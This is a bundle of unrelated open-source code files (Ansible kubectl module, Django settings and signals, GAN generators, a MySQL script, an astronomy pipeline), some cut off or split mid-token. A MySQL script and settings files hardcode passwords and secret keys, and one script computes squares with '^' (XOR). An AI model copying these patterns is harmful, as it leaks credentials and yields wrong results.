#!/usr/bin/python # -*- coding: utf-8 -*- DOCUMENTATION = """ --- module: kube short_description: Manage Kubernetes Cluster description: - Create, replace, remove, and stop resources within a Kubernetes Cluster version_added: "2.0" options: name: required: false default: null description: - The name associated with resource filename: required: false default: null description: - The path and filename of the resource(s) definition file(s). - To operate on several files this can accept a comma separated list of files or a list of files. aliases: [ 'files', 'file', 'filenames' ] kubectl: required: false default: null description: - The path to the kubectl bin namespace: required: false default: null description: - The namespace associated with the resource(s) resource: required: false default: null description: - The resource to perform an action on. pods (po), replicationControllers (rc), services (svc) label: required: false default: null description: - The labels used to filter specific resources. server: required: false default: null description: - The url for the API server that commands are executed against. force: required: false default: false description: - A flag to indicate to force delete, replace, or stop. all: required: false default: false description: - A flag to indicate delete all, stop all, or all namespaces when checking exists. log_level: required: false default: 0 description: - Indicates the level of verbosity of logging by kubectl. state: required: false choices: ['present', 'absent', 'latest', 'reloaded', 'stopped'] default: present description: - present handles checking existence or creating if definition file provided, absent handles deleting resource(s) based on other options, latest handles creating or updating based on existence, reloaded handles updating resource(s) definition using definition file, stopped handles stopping resource(s) based on other options. requirements: - kubectl author: "Kenny Jones (@kenjones-cisco)" """ EXAMPLES = """ - name: test nginx is present kube: name=nginx resource=rc state=present - name: test nginx is stopped kube: name=nginx resource=rc state=stopped - name: test nginx is absent kube: name=nginx resource=rc state=absent - name: test nginx is present kube: filename=/tmp/nginx.yml - name: test nginx and postgresql are present kube: files=/tmp/nginx.yml,/tmp/postgresql.yml - name: test nginx and postgresql are present kube: files: - /tmp/nginx.yml - /tmp/postgresql.yml """ class KubeManager(object): def __init__(self, module): self.module = module self.kubectl = module.params.get('kubectl') if self.kubectl is None: self.kubectl = module.get_bin_path('kubectl', True) self.base_cmd = [self.kubectl] if module.params.get('server'): self.base_cmd.append('--server=' + module.params.get('server')) if module.params.get('log_level'): self.base_cmd.append('--v=' + str(module.params.get('log_level'))) if module.params.get('namespace'): self.base_cmd.append('--namespace=' + module.params.get('namespace')) self.all = module.params.get('all') self.force = module.params.get('force') self.name = module.params.get('name') self.filename = [f.strip() for f in module.params.get('filename') or []] self.resource = module.params.get('resource') self.label = module.params.get('label') def _execute(self, cmd): args = self.base_cmd + cmd try: rc, out, err = self.module.run_command(args) if rc != 0: self.module.fail_json( msg='error running kubectl (%s) command (rc=%d), out=\'%s\', err=\'%s\'' % (' '.join(args), rc, out, err)) except Exception as exc: self.module.fail_json( msg='error running kubectl (%s) command: %s' % (' '.join(args), str(exc))) return out.splitlines() def _execute_nofail(self, cmd): args = self.base_cmd + cmd rc, out, err = self.module.run_command(args) if rc != 0: return None return out.splitlines() def create(self, check=True, force=True): if check and self.exists(): return [] cmd = ['apply'] if force: cm
d.append('--force') if not self.filename: self.module.fail_json(msg='filename required to create') cmd.append('--filename=' + ','.join(self.filename))
return self._execute(cmd) def replace(self, force=True): cmd = ['apply'] if force: cmd.append('--force') if not self.filename: self.module.fail_json(msg='filename required to reload') cmd.append('--filename=' + ','.join(self.filename)) return self._execute(cmd) def delete(self): if not self.force and not self.exists(): return [] cmd = ['delete'] if self.filename: cmd.append('--filename=' + ','.join(self.filename)) else: if not self.resource: self.module.fail_json(msg='resource required to delete without filename') cmd.append(self.resource) if self.name: cmd.append(self.name) if self.label: cmd.append('--selector=' + self.label) if self.all: cmd.append('--all') if self.force: cmd.append('--ignore-not-found') return self._execute(cmd) def exists(self): cmd = ['get'] if self.filename: cmd.append('--filename=' + ','.join(self.filename)) else: if not self.resource: self.module.fail_json(msg='resource required without filename') cmd.append(self.resource) if self.name: cmd.append(self.name) if self.label: cmd.append('--selector=' + self.label) if self.all: cmd.append('--all-namespaces') cmd.append('--no-headers') result = self._execute_nofail(cmd) if not result: return False return True # TODO: This is currently unused, perhaps convert to 'scale' with a replicas param? def stop(self): if not self.force and not self.exists(): return [] cmd = ['stop'] if self.filename: cmd.append('--filename=' + ','.join(self.filename)) else: if not self.resource: self.module.fail_json(msg='resource required to stop without filename') cmd.append(self.resource) if self.name: cmd.append(self.name) if self.label: cmd.append('--selector=' + self.label) if self.all: cmd.append('--all') if self.force: cmd.append('--ignore-not-found') return self._execute(cmd) def main(): module = AnsibleModule( argument_spec=dict( name=dict(), filename=dict(type='list', aliases=['files', 'file', 'filenames']), namespace=dict(), resource=dict(), label=dict(), server=dict(), kubectl=dict(), force=dict(default=False, type='bool'), all=dict(default=False, type='bool'), log_level=dict(default=0, type='int'), state=dict(default='present', choices=['present', 'absent', 'latest', 'reloaded', 'stopped']), ), mutually_exclusive=[['filename', 'list']] ) changed = False manager = KubeManager(module) state = module.params.get('state') if state == 'present': result = manager.create(check=False) elif state == 'absent
JavierGarciaD/Algorithmic_Thinking
src/project_3_test_data.py
Python
gpl-3.0
2,503
0.003196
''' Created on 26/09/2014 @author: javgar119 ''' cluster_list =([Cluster(set([]), 0, 0, 1, 0), Cluster(set([]), 1, 0, 1, 0)]) cluster_list2 = ([Cluster(set([]), 0, 0, 1, 0), Cluster(set([]), 1, 0, 1, 0), Cluster(set([]), 2, 0, 1, 0), Cluster(set([]), 3, 0, 1, 0), Cluster(set([]), 4, 0, 1, 0), Cluster(set([]), 5, 0, 1, 0), Cluster(set([]), 6, 0, 1, 0), Cluster(set([]), 7, 0, 1, 0), Cluster(set([]), 8, 0, 1, 0), Cluster(set([]), 9, 0, 1, 0), Cluster(set([]), 10, 0, 1, 0), Cluster(set([]), 11, 0, 1, 0), Cluster(set([]), 12, 0, 1, 0), Cluster(set([]), 13, 0, 1, 0), Cluster(set([]), 14, 0, 1, 0), Cluster(set([]), 15, 0, 1, 0), Cluster(set([]), 16, 0, 1, 0), Cluster(set([]), 17, 0, 1, 0), Cluster(set([]), 18, 0, 1, 0), Cluster(set([]), 19, 0, 1, 0)]) expected = set([(1.0, 0, 1)]) expected2 = set([(1.0, 9, 10), (1.0, 2, 3), (1.0, 15, 16), (1.0, 11, 12), (1.0, 13, 14), (1.0, 16, 17), (1.0, 14, 15), (1.0, 12, 13), (1.0, 4, 5), (1.0, 18, 19), (1.0, 3, 4), (1.0, 8, 9), (1.0, 17, 18), (1.0, 6, 7), (1.0, 7, 8), (1.0, 5, 6), (1.0, 10, 11), (1.0, 0, 1), (1.0, 1, 2)]) cluster_list3 = ([Cluster(set([]), 90.9548590217, -17.089022585, 1, 0), Cluster(set([]), 90.2536656675, -70.5911544718, 1, 0),
Cluster(set([]), -57.5872347006, 99.7124028905, 1, 0), Cluster(set([]), -15.9338519877, 5.91547495626, 1, 0), Cluster(set([]), 19.1869055492, -28.0681513017, 1, 0), Cluster(set([]), -23.0752410653, -42.1353490324, 1, 0), Cluster(set([]), -65.1732261872, 19.675582646, 1, 0),
Cluster(set([]), 99.7789872101, -11.2619165604, 1, 0), Cluster(set([]), -43.3699854405, -94.7349852817, 1, 0), Cluster(set([]), 48.2281912402, -53.3441788034, 1, 0)]) expected3 = set([(10.5745166749, 0, 7)])
stefan-walluhn/RPi.TC
tests/test_out.py
Python
gpl-3.0
607
0
from rpitc.io import IO
class TestOut: def test_init_on(self, gpio): from rpitc.io.out import Out out = Out(7, status=IO.ON) assert out.status == IO.ON out.off() def test_set_pin(self, out): assert out.set_pin(IO.ON) == IO.ON def test_on(self, out): out.on() assert out.status == IO.ON def test_off(self, out): out.off() assert out.status == IO.OFF def test_toggle(self, out): out.off() out.toggle()
assert out.status == IO.ON out.toggle() assert out.status == IO.OFF
MarionTheBull/watchmaker
tests/test_watchmaker.py
Python
apache-2.0
209
0
import pytest import watchmaker
@pytest.fixture def setup_object(): pass def test_main(): """Placeholder for tests""" # Placeholder assert watchmaker.__ve
rsion__ == watchmaker.__version__
dsanders11/django-future-staticfiles
tests/staticfiles_tests/signals.py
Python
bsd-3-clause
3,301
0
import os import threading import time from django.conf import settings from django.db import connections from django.dispatch import receiver from django.test.signals import setting_changed from django.utils import timezone from django.utils.functional import empty # Most setting_changed receivers are supposed to be added below, # except for cases where the receiver is related to a contrib app. @receiver(setting_changed) def clear_cache_handlers(**kwargs): if kwargs['setting'] == 'CACHES': from django.core.cache import caches caches._caches = threading.local() @receiver(setting_changed) def update_connections_time_zone(**kwargs): if kwargs['setting'] == 'TIME_ZONE': # Reset process time zone if hasattr(time, 'tzset'): if kwargs['value']: os.environ['TZ'] = kwargs['value'] else: os.environ.pop('TZ', None) time.tzset() # Reset local time zone cache timezone.get_default_timezone.cache_clear() # Reset the database connections' time zone if kwargs['setting'] == 'USE_TZ' and settings.TIME_ZONE != 'UTC': USE_TZ, TIME_ZONE = kwargs['value'], settings.TIME_ZONE elif kwargs['setting'] == 'TIME_ZONE' and not settings.USE_TZ: USE_TZ, TIME_ZONE = settings.USE_TZ, kwargs['value'] else: # no need to change the database connnections' time zones return tz = 'UTC' if USE_TZ else TIME_ZONE for conn in connections.all(): conn.settings_dict['TIME_ZONE'] = tz tz_sql = conn.ops.set_time_zone_sql() if tz_sql: conn.cursor().execute(tz_sql, [tz]) @receiver(setting_changed) def clear_serializers_cache(**kwargs): if kwargs['setting'] == 'SERIALIZATION_MODULES': from django.core import serializers serializers._serializers = {} @receiver(setting_changed) def language_changed(**kwargs): if kwargs['setting'] in ['LANGUAGES', 'LANGUAGE_CODE', 'LOCALE_PATHS']: from django.utils.translation import trans_real trans_real._default = None trans_real._active = thre
ading.local() if kwargs['setting'] in ['LANGUAGES', 'LOCALE_PATHS']: from django.utils.translation import trans_real trans_real._translations = {} trans_real.check_for_language.cache_clear() @receiver(setting_changed) def file_storage_changed(**kwargs): file_s
torage_settings = [ 'DEFAULT_FILE_STORAGE', 'FILE_UPLOAD_DIRECTORY_PERMISSIONS', 'FILE_UPLOAD_PERMISSIONS', 'MEDIA_ROOT', 'MEDIA_URL', ] if kwargs['setting'] in file_storage_settings: from django.core.files.storage import default_storage default_storage._wrapped = empty @receiver(setting_changed) def root_urlconf_changed(**kwargs): if kwargs['setting'] == 'ROOT_URLCONF': from django.core.urlresolvers import clear_url_caches, set_urlconf clear_url_caches() set_urlconf(None) @receiver(setting_changed) def static_storage_changed(**kwargs): if kwargs['setting'] in [ 'STATICFILES_STORAGE', 'STATIC_ROOT', 'STATIC_URL', ]: from django.contrib.staticfiles.storage import staticfiles_storage staticfiles_storage._wrapped = empty
giliam/turbo-songwriter
backend/turbosettings/settings.py
Python
mit
4,924
0.001422
# coding:utf-8 """ Django settings for turbo project. Generated by 'django-admin startproject' using Django 1.11.1. For more information on this file, see https://docs.djangoproject.com/en/1.11/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.11/ref/settings/ """ import datetime import os import turbosettings.parameters as parameters from turbosettings.generate_secret_key import secret_key_from_file # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) PROJECT_PATH = os.path.realpath(os.path.dirname(__file__)) USE_X_FORWARDED_HOST = False FORCE_SCRIPT_NAME = "" # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = secret_key_from_file('secret_key') # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'rest_framework', 'songwriter', 'corsheaders', 'debug_toolbar', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'corsheaders.middleware.CorsMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', 'debug_toolbar.middleware.DebugToolbarMiddleware', ] ROOT_URLCONF = 'turbosettings.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': parameters.TEMPLATES_DIRS if parameters.TEMPLATES_DIRS else [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', 'django.template.context_processors.media', ], 'builtins': [ 'django.templatetags.i18n', 'django.contrib.humanize.templatetags.humanize', 'django.contrib.staticfiles.templatetags.staticfiles', ], }, }, ] WSGI_APPLICATION = 'turbosettings.wsgi.application' CORS_ORIGIN_WHITELIST = [ 'localhost:8080', '127.0.0.1:8080', ] # Database # https://docs.djangoproject.com/en/1.11/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators AUTH_PASSWORD_V
ALIDATORS = [
{ 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.11/topics/i18n/ LANGUAGE_CODE = 'fr' TIME_ZONE = "Europe/Paris" USE_I18N = True USE_L10N = True USE_TZ = True gettext = lambda x: x LANGUAGES = ( ('fr', gettext('Français')), ('en', gettext('English')), ) LOCALE_PATHS = ( os.path.join(BASE_DIR, 'locale/'), ) # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.11/howto/static-files/ STATIC_URL = FORCE_SCRIPT_NAME + "/static/" STATIC_ROOT = BASE_DIR + '/static/' STATICFILES_DIRS = parameters.STATICFILES_DIRS if parameters.STATICFILES_DIRS else ( "assets/", ) FIXTURE_DIRS = ( 'fixtures/' ) MEDIA_URL = '/' MEDIA_ROOT = BASE_DIR + '/media/' REST_FRAMEWORK = { 'DEFAULT_PERMISSION_CLASSES': ( 'rest_framework.permissions.IsAuthenticated', ), 'DEFAULT_AUTHENTICATION_CLASSES': ( 'rest_framework_jwt.authentication.JSONWebTokenAuthentication', ), } JWT_AUTH = { 'JWT_SECRET_KEY': secret_key_from_file('secret_key_jwt'), 'JWT_ALLOW_REFRESH': True, 'JWT_EXPIRATION_DELTA': datetime.timedelta(seconds=18000), } # For debug toolbar INTERNAL_IPS = ["127.0.0.1"] from turbosettings.settings_local import *
bgroveben/python3_machine_learning_projects
learn_kaggle/deep_learning/packages/learntools/gans/generators.py
Python
mit
2,657
0.007151
import tensorflow as tf from tensorflow.python.keras.layers import Conv2D, Conv2DTranspose, Conv3D, Dense, Reshape tfgan = tf.contrib.gan def basic_generator(noise): """Simple generator to produce MNIST images. Args: noise: A single Tensor representing noise. Returns: A generated image in the range [-1, 1]. """ channels_after_reshape = 256 net = Dense(1024, activation='elu')(noise) net = Dense(7 * 7 * channels_after_reshape, activation='elu')(net) net = Reshape([7, 7, channels_after_reshape])(net) net = Conv2DTranspose(64, kernel_size=4, strides=2, padding="same", activation='elu')(net) net = Conv2DTranspose(32, kernel_size=4, strides=
2, padding="same", activation='elu')(net) # Make sure that ge
nerator output is in the same range as `inputs` # ie [-1, 1]. net = Conv2D(1, kernel_size=4, activation = 'tanh', padding='same')(net) return net def conditional_generator(inputs): """Generator to produce MNIST images. Args: inputs: A 2-tuple of Tensors (noise, one_hot_labels). Returns: A generated image in the range [-1, 1]. """ noise, one_hot_labels = inputs channels_after_reshape = 128 net = Dense(1024, activation='elu')(noise) net = tfgan.features.condition_tensor_from_onehot(net, one_hot_labels) net = Dense(7 * 7 * channels_after_reshape, activation='elu')(net) net = Reshape([7, 7, channels_after_reshape])(net) net = Conv2DTranspose(64, kernel_size=4, strides=2, padding="same", activation='elu')(net) net = Conv2DTranspose(32, kernel_size=4, strides=2, padding="same", activation='elu')(net) # Make sure that generator output is in the same range as `inputs` # ie [-1, 1]. net = Conv2D(1, kernel_size=4, activation = 'tanh', padding='same')(net) return net def encoder_decoder_generator(start_img): """ """ layer1 = Conv2D(64, kernel_size=4, strides=2, activation='elu', padding='same')(start_img) layer2 = Conv2D(64, kernel_size=4, strides=2, activation='elu', padding='same')(layer1) layer3 = Conv2D(64, kernel_size=4, strides=1, activation='elu', padding='same')(layer2) layer4 = Conv2DTranspose(64, kernel_size=4, strides=2, activation='elu', padding="same")(layer3) layer5 = Conv2DTranspose(64, kernel_size=4, strides=2, activation='elu', padding="same")(layer4) layer6 = Conv2D(64, kernel_size=2, strides=1, activation='elu', padding='same')(layer5) # Make sure that generator output is in the same range as `inputs` # ie [-1, 1]. net = Conv2D(3, kernel_size=1, activation = 'tanh', padding='same')(layer6) return net
dbarobin/pytools
py-practice/insert_data.py
Python
gpl-2.0
868
0.002304
#!/usr/bin/python # -*- coding: utf-8 -*- # Author: Robin Wen # Date: 2014-11-18 # Desc: Connect to MySQL using MySQLdb package, and insert test data. import MySQLdb as mdb con = mdb.connect(host='10.10.3.121', user='robin', passwd='robin89@DBA', db='testdb', unix_socket='/tmp/mysql5173.sock', port=5173
) with con: cur = con.cursor() cur.execute("DROP TABLE IF EXISTS Writers") cur.execute("CREATE TABLE Writers(Id INT PRIMARY KEY AUTO_INCREMENT, \ Name VARCHAR(25))") cur.execute("INSERT INTO Writers(Name) VALUES('Jack London')") cur.execute("INSERT INTO Writers(Name) VALUES('Honore de Balzac')") cur.execute("INSERT INTO W
riters(Name) VALUES('Lion Feuchtwanger')") cur.execute("INSERT INTO Writers(Name) VALUES('Emile Zola')") cur.execute("INSERT INTO Writers(Name) VALUES('Truman Capote')") con.close()
chrisortman/CIS-121
k0459866/Lessons/ex12.py
Python
mit
2,216
0.009928
#import factorial #import square x = int(raw_input("What is 'x'?\n")) y = int(raw_input("What is y?\n")) # question0 = str(raw_input("Define a y value? (y/n)\n")) # if (question0 == "y","Y","yes","Yes"): # y = int(raw_input("What will 'y' be?\n")) # elif (y == "n","N","no","No"): # question2 = str(raw_input("Is y = 10 ok?\n")) # if (question2 == "y","Y","yes","Yes"): # y = 10 # elif (question2 == "n","N","no","No"): # y = int(raw_input("What will 'y' be?\n")) # else: # print "Please insert and interger" # else: # print "Please insert an interger." print "Using that information, we can do some mathematical equations." if x > y: #is not None: print "x, %d, is greater than y, %d." % (x, y) elif x == y: #is not None: print "x, %d, is equal to y, %d." % (x, y) elif x < y: #is not None: print "x, %d, is less than y, %d." % (x, y) elif x is not int: print "x should be a interger, you put it as %d" % (x) elif x is None: print "Please rerun the code." else: print "Something went wrong!" add = (x + y) sub = (x - y) mult = (x * y) div = (x / y) rem = (x % y) xeven = (x % 2 == 0) xodd = (x % 2 != 0) yeven = (y % 2 ==
0) yodd = (y % 2 != 0) # xfact = (factorial(x)) # yfact = (factorial(y)) print "If you add x and y, you'll get %s." % add print "If you subtract x and y, you'll get %s." % sub print "If you multiply x and y, you'll get %s." % mult print "If you divide x
and y, you'll get %s, with a remainder of %s." % (div, rem) if (x % 2 == 0): print "x is even." if (x % 2 != 0): print "x is odd." if (y % 2 == 0): print "y is even." if (y % 2 != 0): print "y is odd." print "If you square x, you get %s, and y squared is %s." % ((x^2),(y^2)) print "If you cube x, you get %s, and y cubed is %s." % ((x^3), (y^3)) #print "If you take x factorial, you get %s, and y factorial is %s." % ((xfact), (yfact)) #print "The square root of x is %s, and the square root of y is %s." % (square(x), square(y)) print "" # from sys import argv # import random # value = (1,2,3,4,5,6) # roll, string = argv # def choice(roll): # random.choice(dice) # return choice # choice(roll) # dice = choice(value)
alex-dow/psistatsrd
psistatsrd/utils/drawable.py
Python
mit
2,757
0.009068
import pygame import sys from psistatsrd.app import App def create_queue_row(data, config): mem_graph = create_mem_graph(config) cpu_graph = create_cpu_graph(config) scroll_text = [] title = [] if type(data['ipaddr']).__name__ == "list": scroll_text = scroll_text + data['ipaddr'] else: scroll_text = [data['ipaddr']] scroller = create_scroller(scroll_text, config) row = create_row(config) row.host = data['hostname'] row.add_drawable('scroller', scroller, App.DRAW_EVENT) row.add_drawable('cpu', cpu_graph, App.POLL_EVENT) row.add_drawable('mem', mem_graph, App.POLL_EVENT) return row def create_row(config): row = StatRow( border_width=int(config['statrow.border_width']), border_color=config['statrow.border_color'], height=int(config['statrow.height']), width=int(config['statrow.width']), bgcolor=config['statrow.bgcolor'], title_font_size=int(config['statrow.title_font_size']), title_font_aa=config['statrow.title_font_aa'], title_font=config['statrow.title_font'], title_color=config['statrow.title_color'], ) return row def create_scroller(scroll_text, config): s =
Scroller( scroll_speed = float(config['scroller.scroll_speed']), scroll_delay = int(config['scroller.scroll_delay']), scroll_pause = int(config['scroller.scroll_pause']), text_font = config['scroller.font.name'], text_aa = config['scroller.font.aa'], text_size = int(config['scroller.font.size']), width = int(config['scroller.width']), height = int(config['scroller.height']), color=config['scr
oller.color'], bgcolor=config['scroller.bgcolor'], text_lines=scroll_text ) return s def create_resource_graph(key, config): g = Graph2( height=int(config['graph.%s.height' % key]), width=int(config['graph.%s.width' % key]), line_width=int(config['graph.%s.line_width' % key]), color=config['graph.%s.color' % key], bgcolor=config['graph.%s.bgcolor' % key], line_aa=config['graph.%s.line_aa' % key] ) max_color = 'graph.%s.max_color' % key min_color = 'graph.%s.min_color' % key if max_color in config: g.max_color = config[max_color] if min_color in config: g.min_color = config[min_color] return g def create_cpu_graph(config): return create_resource_graph('cpu', config) def create_mem_graph(config): return create_resource_graph('mem', config) from psistatsrd.app import App from psistatsrd.graph2 import Graph2 from psistatsrd.scroller import Scroller from psistatsrd.statrow import StatRow
alexrudy/AstroObject
Examples/pipeline.py
Python
gpl-3.0
7,924
0.016406
#!/usr/bin/env python # -*- coding: utf-8 -*- # # pipeline.py # AstroObject # # Created by Alexander Rudy on 2012-04-25. # Copyright 2012 Alexander Rudy. All rights reserved. # u""" Basic CCD Reduction Pipeline written with AstroObject """ # Python Imports import shutil import os import collections # Numpy Imports import numpy as np # Package Resources Imports from pkg_resources import resource_filename # PyRAF Imports from pyraf import iraf from iraf import imred, ccdred from AstroObject.simulator import Simulator from AstroObject.simulator import ( optional, description, include, replaces, depends, excepts, collect, ignore, help ) from AstroObject.image import ImageStack from AstroObject.iraftools import UseIRAFTools from AstroObject.loggers import logging ImageStack = UseIRAFTools(ImageStack) class Pipeline(Simulator): """A task manager for the RC Pipeline""" def __init__(self): super(Pipeline, self).__init__(commandLine=True,name="Example Pipeline",version="1.0") self.config.load(resource_filename(__name__,"Defaults.yaml")) self.config.setFile("Main") self.config.load() self.collect() @ignore #Don't load this method as a stage... it is a helper method used to implement other stages. def load_type(self,key,stack): """Load a specific type of files using a generalized loading procedure""" if isinstance(self.config[key]["Files"],collections.Sequence): ReadStates = [] for filename in self.config[key]["Files"]: ReadStates += stack.read(filename) self.log.debug("Loaded %s: %s" % (key,filename)) return ReadStates else: self.log.error("No %s files are given." % key) raise IOError("No %s files are given." % key) def load_bias(self): """Loading Raw Bias Frames""" # Load individual bias frames. self.bias = ImageStack()
self.load_type("Bias",self.bias)
# Set Header Values for each image. for frame in self.bias.values(): frame.header.update('IMAGETYP','zero') self.log.debug("Set IMAGETYP=zero for frame %s" % frame) self.log.debug("Set Header IMAGETYP=zero for frames %r" % self.bias.list()) def load_dark(self): """Loading Dark Frames""" # Load individual bias frames. self.dark = ImageStack() self.load_type("Dark",self.dark) # Set Header Values for each image. for frame in self.dark.values(): frame.header.update('IMAGETYP','dark') self.log.debug("Set IMAGETYP=dark for frame %s" % frame) self.log.debug("Set Header IMAGETYP=dark for frames %r" % self.dark.list()) def load_flat(self): """Loading Dark Frames""" # Load individual bias frames. self.flat = ImageStack() self.load_type("Flat",self.flat) # Set Header Values for each image. for frame in self.flat.values(): frame.header.update('IMAGETYP','flat') self.log.debug("Set IMAGETYP=flat for frame %s" % frame) self.log.debug("Set Header IMAGETYP=flat for frames %r" % self.dark.list()) @help("Create bias frames from the configured bias list.") @depends("load-bias") # Declare a dependency on another stage: Method ``load_bias()``. def create_bias(self): """Creating Combined Bias Frame""" self.log.debug("Running iraf.zerocombine on image list...") iraf.unlearn(iraf.zerocombine) iraf.zerocombine(self.bias.iinat(), output=self.bias.iout("Bias"), combine=self.config["Bias.Combine"], ccdtype="zero", reject=self.config["Bias.Reject"], scale="none", nlow=0, nhigh=1, nkeep=1, mclip="yes", lsigma=3.0, hsigma=3.0, rdnoise="0.", gain ="1." ) self.bias.idone() @help("Create Dark Frames") @depends("load-dark") def create_dark(self): """Creating Combined Dark Frame""" self.log.debug("Running iraf.darkcombine on image list...") iraf.unlearn(iraf.darkcombine) iraf.darkcombine(self.dark.iraf.inatfile(), output=self.dark.iraf.outfile("Dark"), combine=self.config["Dark.Combine"], ccdtype="dark", reject=self.config["Dark.Reject"], process="no", scale="exposure", nlow=0, nhigh=1, nkeep=1, mclip="yes", lsigma=3.0, hsigma=3.0, rdnoise="0.", gain ="1." ) self.dark.iraf.done() @help("Create Flat Frames") @depends("load-flat") def create_flat(self): """Creating Combined Flat Frame""" self.log.debug("Runnign iraf.flatcombine on image list...") iraf.unlearn(iraf.flatcombine) iraf.flatcombine(self.flat.iraf.inatfile(), output=self.flat.iraf.outfile("Flat"), combine=self.config["Flat.Combine"], ccdtype="flat", reject=self.config["Flat.Reject"], scale=self.config["Flat.Scale"], process="no", subsets="no", nlow=0, nhigh=1, nkeep=1, mclip="yes", lsigma=3.0, hsigma=3.0, rdnoise="0.", gain ="1.") self.flat.iraf.done() def load_data(self): """Loading Raw Data into the system.""" self.data = ImageStack() self.load_type("Data",self.data) @include # Set this stage as something to be run with the *all macro. @depends("create-bias","load-data") @help("Subtract Bias Frame") def subtract_bias(self): """Subtracting Bias Frame""" iraf.unlearn(iraf.ccdproc) iraf.ccdproc(self.data.iraf.modatfile(), ccdtype="", fixpix="no", overscan="no", trim ="no", zerocor="yes", darkcor="no", flatcor ="no", zero=self.bias.iin("Bias")) self.data.idone() @include # Set this stage as something to be run with the *all macro. @depends("create-dark","load-data") @help("Subtract Dark Frame") def subtract_dark(self): """Subtracting Dark Frame""" iraf.unlearn(iraf.ccdproc) iraf.ccdproc(self.data.iraf.modatfile(), ccdtype="", fixpix="no", overscan="no", trim ="no", zerocor="no", darkcor="yes", flatcor ="no", dark=self.dark.iin("Dark")) self.data.idone() @include # Set this stage as something to be run with the *all macro. @depends("create-flat","load-data") @help("Divide out flat frame") def divide_flat(self): """Dividing by Flat Frame""" iraf.unlearn(iraf.ccdproc) iraf.ccdproc(self.data.iraf.inatfile(), output=self.data.iraf.outatfile(append="-Flat"), flat=self.flat.iin("Flat"), ccdtype="", fixpix="no", overscan="no", trim ="no", zerocor="no", flatcor="yes", darkcor ="no") self.data.iraf.done() # Since the simulator loads and runs stages in order, this stage will always # be run last. @include # Set this stage as something to be run with the *all macro. @depends("load-data") def save_file(self): """Save the new fits file""" self.data.write("DataFile.fits",frames=[self.data.framename],clobber=True) @help("Save Partial Images") @depends("create-flat","create-dark","create-bias") def save_partials(self): """Saving partial images""" self.bias.write(frames=["Bias"],filename=self.config["Bias.Master"],clobber=True) self.dark.write(frames=["Dark"],filename=self.config["Dark.Master"],clobber=True) self.flat.write(frames=["Flat"],filename=self.config["Flat.Master"],clobber=True) def main(): pipeline = Pipeline() pipeline.run() if __name__ == '__main__': main()
jacoboamn87/todolist
todo/settings.py
Python
gpl-3.0
3,308
0.001209
""" Django settings for todo project. Generated by 'django-admin startproject' using Django 1.9.2. For more information on this file, see https://docs.djangoproject.com/en/1.9/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.9/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '-b9xx8+eul3#8q&c@tv^5e!u66j=a6@377$y^b2q!0a%vj+!ny' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition DJANGO_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] THIRD_PARTY_APPS = [] CUSTOM_APPS = [ 'tasks.apps.TasksConfig', ] INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + CUSTOM_APPS MIDDLEWARE_CLASSES = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'todo.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': ['todo/templates'], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'todo.wsgi.application' # Database # https://docs.djangoproject.com/en/1.9/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 